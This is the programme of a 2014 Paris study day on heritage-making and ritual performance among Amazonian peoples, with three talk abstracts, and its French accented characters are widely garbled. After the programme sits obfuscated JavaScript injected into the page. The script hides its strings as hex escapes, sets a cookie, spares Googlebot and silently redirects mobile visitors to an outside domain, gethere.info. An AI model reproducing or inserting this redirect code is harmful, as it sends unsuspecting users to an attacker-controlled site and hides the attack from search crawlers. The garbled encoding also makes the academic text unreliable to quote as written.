JOURNA�E D’A�TUDE FABRIQ’AM : patrimonialisation et mise en spectacle du rituel en Amazonie, le 13 fA�vrier 2014, LAS, Paris

PATRIMONIALISATION ET MISE EN SPECTACLE

DU RITUEL EN AMAZONIE

Enjeux A�pistA�mologiques et sociologiques

JournA�e Fabriq’am, Jeudi 13 fA�vrier 2014, de 9h30 A� 13h,

Salle LA�vi-Strauss au LAS, 52 rue Cardinal Lemoine, 75005 Paris.

PROGRAMME

9:30h – 10h : CafA�

10h – 10:30

Rituel et patrimonialisation : donnA�es croisA�es sur les Karaja, les TapirapA� et les Yawalapiti du BrA�sil central

Nathalie PA�teschA�(Centre Erea du Lesc)

Dans les demandes de collaboration faites par les groupes indigA?nes du BrA�sil central auprA?s da��organismes extA�rieurs pour la sauvegarde de leur patrimoine culturel, la��enregistrement sonore et visuel des principaux rituels occupe une place prA�pondA�rante. Cette exigence indigA?ne nous incite au prA�alable A� prA�ciser le lien existant aujourda��hui entre A� culture A� et A� rituel A� chez ces peuples dont les corpus mythiques et cA�rA�moniels sont, par tradition, largement ouverts aux apports extA�rieurs. Notre intA�rA?t portera ensuite sur la faA�on da��utiliser, voire da��adapter la pratique cA�rA�monielle, A� des fins de rA�appropriation, de rA�habilitation, voire de reconstruction de la��image ethnique, dans cette rA�gion da��Amazonie brA�silienne oA? la camA�ra mA�diatise depuis longtemps les relations entre Indiens et Blancs. Enfin sera posA�e la question de savoir si cette mise en spectacle, ce caractA?re A� performatif A� imposA� A� la culture indigA?ne, selon la��expression de M. Carneiro da Cunha, ne trouve pas ses limites dans la construction patrimoniale elle-mA?me : insidieusement, une rupture sa��A�tablit au sein des villages entre deux catA�gories de A� dA�tenteurs de la culture A� ; ceux qui participent aux rituels et ceux qui observent ces pratiques traditionnelles, les A� mettent en boA�te A� et en bibliothA?que.

10:30h – 10:45h : Discussion

10:45h – 11:15h

Regarder le Yankwa : la primautA� de la vision dans la��inventaire du patrimoine culturel Enawene-NaweA�

ChloA� Nahum-ClaudelA�(EHESS, Mondes Am)

Le document officiel qui a motivA� la��inscription du yankwa au Patrimoine Culturel ImmatA�riel par la��institution brA�silienne chargA�e du patrimoine, la��IPHAN, a A�tA� rA�cemment rendu public. Il y a lA� la��occasion da��examiner les produits tangibles de la patrimonialisation du yankwa : da��une part ce dossier, long de 212 pages, et da��autre part le film Yaokwa, o patrimonio ameaA�adoA� (Carelli et Campoli 2009), destinA� A� la��accompagner. Le dossier est en grande partie constituA� de photographies et le processus de patrimonialisation a accordA� une grande importance A� la culture visuelle et matA�rielle a�� on a notamment employA� un architecte pour rA�aliser des croquis techniques des barrages de pA?che, de la maison des flA�tes et des malocas, ainsi qua��un photographe. En outre, le film constitue le rA�sultat le plus important de ce processus, tant objectivement par le temps et les ressources qui y ont A�tA� consacrA�s, que subjectivement, dans les jugements des Enawene. Pour analyser la primautA� des dimensions visuelles dans cet inventaire, je partirai de la��affirmation de Terence Turner selon laquelle A� la reprA�sentation, loin da��A?tre un projet purement occidental imposA� aux Kayapo sous la��influence des mA�dias occidentaux, est tout aussi kayapo que la galette de manioc A� la viande A� (Turner 1992: 10), ainsi que sur la description que donne Carlos Fausto de la��enthousiasme avec lequel les Kuikuro ont adoptA� la vidA�o. Quel rA?le les Enawene ont-ils jouA� dans le choix de mettre en forme la A� culture A� de maniA?re A�minemment visuelle, lorsqua��il a fallu la faire reconnaA�tre par des A�trangers ? DA�noncA�e notamment par James Weiner (1997) dans son analyse polA�mique de la��appropriation de la vidA�o par les populations indigA?nes en vue de leur autoreprA�sentation, la A�A� mise en spectacle A� de la culture semble au contraire aller de soi pour les Enawene a�� alors mA?me qua��il peut sembler malaisA� de capturer dans des photographies, ou mA?me dans une vidA�o de 30 minutes, un processus mythopoA?A�tique qui sa��A�tend sur huit mois. Je proposerai la��hypothA?se suivante : cette importance accordA�e au visuel convient aux ambivalences A�pistA�mologiques propres aux Enawene, car elle permet da��A�viter da��expliciter un savoir sacrA�, mystA�rieux et irreprA�sentable tout en mettant au premier plan la performance, les artefacts, la��ornementation et de longues sA�quences da��A�vA�nements. Cette analyse sa��appuiera A� la fois sur la��examen des films qui ont A�tA� faits sur le yankwa (ValadA?o 1995, Carelli et Campoli 2009) et sur une rA�flexion sur mon propre travail de terrain, durant lequel les Enawene entendaient souvent satisfaire mes interrogations par cette simple rA�ponse : A� regarde et tu verras A�.

11:15h – 11:45h : Discussion et pause-cafA�

11:45h – 12:15h

La fA?te de boisson comme objet de patrimonialisation et la patrimonialisation comme processus festif chez les SuruA� du RondA?nia (Amazonie brA�silienne)

CA�dric YvinecA�(Fondation Thiers/LAS)

DA?s que les SuruA� ont besoin de montrer A� des Blancs qua��ils possA?dent une A� culture A� singuliA?re, ca��est une pratique rituelle, la fA?te de boisson, qui est systA�matiquement choisie. Ce choix sa��explique probablement A� la fois parce que cette pratique permet de produire et manipuler des choses qui sont susceptibles da��apparaA�tre aux yeux des Blancs comme des supports de A� culture A� (produits artisanaux, peintures corporelles, chants, etc.) et parce que la fA?te de boisson A�tait traditionnellement la��une des pratiques les plus valorisA�es. Cependant la��examen attentif de cette pratique rituelle, A� la fois par la reconstruction de sa logique traditionnelle et par la��observation de sa mise en A�uvre actuelle, laisse penser qua��il y a sans doute dans ce choix des raisons plus profondes et plus intA�ressantes que la simple facilitA� de mise en spectacle. Ces raisons sa��enracinent dans la dynamique mA?me de la fA?te de boisson suruA�. Da��une part, la fA?te de boisson traditionnelle sa��inscrivait dans les tensions A� la fois entre factions, et au sein de ces factions entre gA�nA�rations, entre jeunes hommes ambitieux et aA�nA�s A�tablis. Or les fA?tes destinA�es A� montrer la A� culture suruA� A� rA�articulent ces deux rivalitA�s, par les rivalitA�s entre villages et par les rA?les que la patrimonialisation assigne aux gA�nA�rations (anciens dA�positaires de la A� culture A�, jeunes contrA?lant les relations avec les Blancs). Da��autre part la mise en spectacle de la fA?te devant les Blancs constitue en elle-mA?me un processus inscrit dans la logique-mA?me de la fA?te traditionnelle, da��abord parce que les Blancs y occupent la position clA� de spectateurs attestant de la��intA�rA?t des actes festifs. En outre dA?s que la fA?te traditionnelle se termine comme spectacle A� culturel A�, elle continue vA�ritablement, comme processus A�conomique et politique (vente da��objets artisanaux, dA�penses somptuaires, constitution de souvenirs prestigieux (vidA�os), etc.). Ainsi, loin da��A?tre une dA�vitalisation de la A� culture A�, la patrimonialisation peut apparaA�tre en ce cas comme un processus qui obA�it A� une logique culturelle propre.

12:15h -13h : A�Discussion

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}